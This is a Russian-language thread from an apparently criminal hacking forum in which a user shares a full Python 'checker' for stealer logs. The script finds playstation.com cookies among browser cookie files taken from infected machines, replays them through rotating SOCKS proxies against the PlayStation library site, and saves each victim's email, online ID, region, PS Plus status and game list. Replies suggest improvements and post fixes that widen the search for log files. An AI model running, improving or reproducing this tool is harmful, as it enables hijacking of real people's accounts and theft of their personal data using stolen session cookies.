• XSS.stack #1 – первый литературный журнал от юзеров форума

PlayStation log checker python code

Peace

(L3) cache
Забанен
Регистрация
19.12.2022
Сообщения
255
Реакции
80
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет! Благодарю всех за советы, наставления с прошлого треда. Решил полученные знания реализовать в новом проекте и решил написать чекер логов на запрос playstation.
Работает с путем - "Папка_куков\\Название_лога\\browser\\cookies", первую и вторую часть пути всегда можете изменить в коде, 11 и 53 строчка соответственно.
Использует прокси типа - socks4/socks5(формат: log:pass@ip:port), так же можно изменить количество потоков.
Untitled.png
Python:
import os
import asyncio
import re
import aiohttp
from aiohttp import ClientSession
import json
from aiohttp_socks import ProxyConnector

type_proxy = 'TYPE PROXY' #socks4 or socks5
PROXIES = []
folder_path = 'path\\to\\folder\\'
link = 'https://library.playstation.com/recently-purchased/'
file_proxy = 'file_proxy.txt'

USER_INFO = ['country', 'isPsPlusMember', 'email', 'onlineId']
CATEGORIES = ['REGION:\t', 'PsPlus:\t', 'Email:\t', 'UserID:\t', 'Count Games:\t']

LIMIT_IN_PAGE = 24
TOTAL_PATHS = 0
THREADS_COUNT = 5
CHECKED_TXT = 0
NOT_CHECKED_TXT = 0

QUEUE = asyncio.Queue()
THLOCK = asyncio.Lock()

headers = {
    'authority': 'library.playstation.com',
    'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
    'referer': 'https://store.playstation.com/',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
}

params = {
    'smcid': 'web-store:ru-ua:web-toolbar-my-playstation:game library',
}


async def check_txt(filename: str):
    with open(filename, "r") as file:
        content = file.read()
        if "playstation.com" in content.lower():
            return True
        else:
            return False


async def find_path():
    global TOTAL_PATHS
    file_list = os.listdir(folder_path)
    list_path = []
    for i in file_list:
        browser_path = os.path.join(folder_path + i, "browsers\\cookies")
        files = os.listdir(browser_path)
        for i in files:
            if await check_txt(os.path.join(browser_path, i)):
                list_path.append(os.path.join(browser_path, i))
    TOTAL_PATHS = len(list_path)
    return list_path


async def get_proxy():
    list = []
    with open(f'{file_proxy}', 'r', encoding='UTF-8') as file:
        lines = file.readlines()
    for i in lines:
        list.append(i)
    return list


async def use_proxy():
    global PROXIES
    first = PROXIES.pop(0)
    PROXIES.append(first)
    return first


async def sequence_sum(n: int):
    if n == 1:
        return 0
    else:
        return (n - 2) * 24 + 24


async def net_to_cookie(filename: str, service: str):
    cookies = {}
    try:
        with open(filename, 'r', encoding='utf-8') as fp:
            for line in fp:
                try:
                    if not re.match(r'^\#', line) and service in line:
                        lineFields = line.strip().split('\t')
                        cookies[lineFields[5]] = lineFields[6]
                except:
                    continue
    except UnicodeDecodeError:
        with open(filename, 'r') as fp:
            for line in fp:
                try:
                    if not re.match(r'^\#', line) and service in line:
                        lineFields = line.strip().split('\t')
                        cookies[lineFields[5]] = lineFields[6]
                except:
                    continue
    return cookies


async def write_to_file(info_account: list, games: list, path: str):
    async with THLOCK:
        with open('PlayStationResult.txt', 'a', encoding='UTF-8') as file:
            for categories, info in zip(CATEGORIES, info_account):
                file.write(f'{categories}{info}\n')
            file.write(f'Path to file:\t{path}\n\n')
            for game in games:
                file.write(f'{game}\n')
            file.write('-' * 55 + '\n')


async def get_info_account(cookies: dict):
    global CHECKED_TXT, NOT_CHECKED_TXT
    info = []
    proxy = await use_proxy()
    connector = ProxyConnector.from_url(f'{type_proxy}://{proxy}')
    async with aiohttp.ClientSession(connector=connector) as session:
        try:
            async with session.get(link, headers=headers, cookies=cookies, params=params) as response:
                response = await response.text()
                r = response.split('<script id="__NEXT_DATA__" type="application/json">')[1].split('</script>')[0]
                data = json.loads(r)
                count_all_games = \
                    data['props']['apolloState']['ROOT_QUERY']['purchasedTitlesRetrieve({"isActive":true,"platform":[' \
                                                               '"ps4","ps5"],"size":24,"sortBy":"ACTIVE_DATE",' \
                                                               '"sortDirection":"desc","start":0,' \
                                                               '"subscriptionService":"NONE"})']['pageInfo']['totalCount']
                for i in USER_INFO:
                    info_data = data['props']['appProps']['session']['userData'][f'{i}']
                    info.append(info_data)
                info.append(count_all_games)
                TOTAL_PAGES = int(count_all_games)
                TOTAL_PAGES = TOTAL_PAGES // LIMIT_IN_PAGE if (TOTAL_PAGES % LIMIT_IN_PAGE) == 0 else TOTAL_PAGES // LIMIT_IN_PAGE + 1
                games = await scrape_games(session, cookies, TOTAL_PAGES)
                CHECKED_TXT += 1
                return info, games
        except Exception as e:
            NOT_CHECKED_TXT += 1
            # print(f'[Err] Bad cookies - {e}')
            return None, None


async def scrape_games(session: ClientSession, cookies: dict, TOTAL_PAGES: int):
    game_list = []
    try:
        for i in range(1, TOTAL_PAGES + 1):
            async with session.get(f'{link}/{i}', headers=headers,
                                   cookies=cookies,
                                   params=params) as response:
                response = await response.text()
                r = response.split('<script id="__NEXT_DATA__" type="application/json">')[1].split('</script>')[0]
                data = json.loads(r)
                start = await sequence_sum(i)
                games = \
                    data['props']['apolloState']['ROOT_QUERY'][
                        'purchasedTitlesRetrieve({"isActive":true,"platform":["ps4",' \
                        '"ps5"],"size":24,"sortBy":"ACTIVE_DATE",' \
                        f'"sortDirection":"desc","start":{start},' \
                        '"subscriptionService":"NONE"})']['games']
                for i in games:
                    game_list.append(i['name'])
        return game_list
    except Exception as e:
        print(f'[*] No games - {e}')
        return None


async def worker():
    global QUEUE, CHECKED_TXT, NOT_CHECKED_TXT
    while not QUEUE.empty():
        get_path = await QUEUE.get()
        cookies = await net_to_cookie(get_path, 'playstation.com')
        info_account, games = await get_info_account(cookies)
        if (info_account and games) is not None:
            await write_to_file(info_account, games, get_path)
            print(f'[*] Good cookies: {CHECKED_TXT}')
        else:
            print(f'[*] Bad cookies: {NOT_CHECKED_TXT}')


async def main():
    global TOTAL_PATHS, QUEUE, CHECKED_TXT, NOT_CHECKED_TXT, PROXIES
    list_dir_files = await find_path()
    PROXIES = await get_proxy()
    print(f'[*] Finded paths {TOTAL_PATHS}')
    if TOTAL_PATHS == 0:
        exit()
    [QUEUE.put_nowait(path) for path in list_dir_files]
    treads = [asyncio.create_task(worker()) for _ in range(1, THREADS_COUNT + 1)]
    await asyncio.gather(*treads)
    print(f'[*] Finded cookies with PlayStation  {TOTAL_PATHS} // GOOD: {CHECKED_TXT}, BAD: {NOT_CHECKED_TXT}')


if __name__ == '__main__':
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
    asyncio.run(main())

Дисклеймер:zns6:
Данным кодом автор не претендует на истинность или объективность, а лишь показывает код, возможно моментами ошибочный. Буду рад, если ты найдешь ошибки или сможешь внести полезные корректировки!
 
Последнее редактирование:
Лучше использовать glob для поиска всех нужных путей, чтобы не менять их в коде. И раз ты решил писать на асинках, то и работа с файлами должна быть на асинках(aiofiles), потому что это блокирующий код. Так же нужно отдельно обрабатывать обращение к dict и запросы, так как если одного ключа не будет, функция get_info_account вернет None, try except KeyError + используй метод get dict.get('key', 'not found'). Можно еще указать на множество мелких ошибок но это самое главное
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Лучше использовать glob для поиска всех нужных путей, чтобы не менять их в коде. И раз ты решил писать на асинках, то и работа с файлами должна быть на асинках(aiofiles), потому что это блокирующий код. Так же нужно отдельно обрабатывать обращение к dict и запросы, так как если одного ключа не будет, функция get_info_account вернет None, try except KeyError + используй метод get dict.get('key', 'not found'). Можно еще указать на множество мелких ошибок но это самое главное
да, спасибо ! Некоторые вещи уже исправлены, т.к с того дня было написано несколько проектов, но спасибо, что подчеркнули нужные детали
 
Ку, немного фиксов)
Python:
async def check_txt(filename: str):
    try:
        with open(filename, "r", encoding="utf-8") as file: #Ошибка UnicodeDecodeError говорит о том, что ваш код пытается прочитать файл, который содержит символы, которые не могут быть декодированы с использованием стандартной кодировки Windows cp1252. Это обычно происходит, когда файл содержит не-ASCII символы.
            content = file.read()
            if "playstation.com" in content.lower():
                return True
            else:
                return False
    except UnicodeDecodeError:
        return False



async def find_path():
    global TOTAL_PATHS
    list_path = []
    checked_files = 0  # добавляем счетчик проверенных файлов
    for dirpath, dirnames, filenames in os.walk(folder_path):
        for file in filenames:
            if file.endswith(".txt"):
                filepath = os.path.join(dirpath, file)
                checked_files += 1  # увеличиваем счетчик каждый раз, когда проверяем файл
                print(f"Checking file #{checked_files} at {filepath}")  # выводим сообщение о проверке файла
                if await check_txt(filepath):
                    list_path.append(filepath)
    TOTAL_PATHS = len(list_path)
    return list_path
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх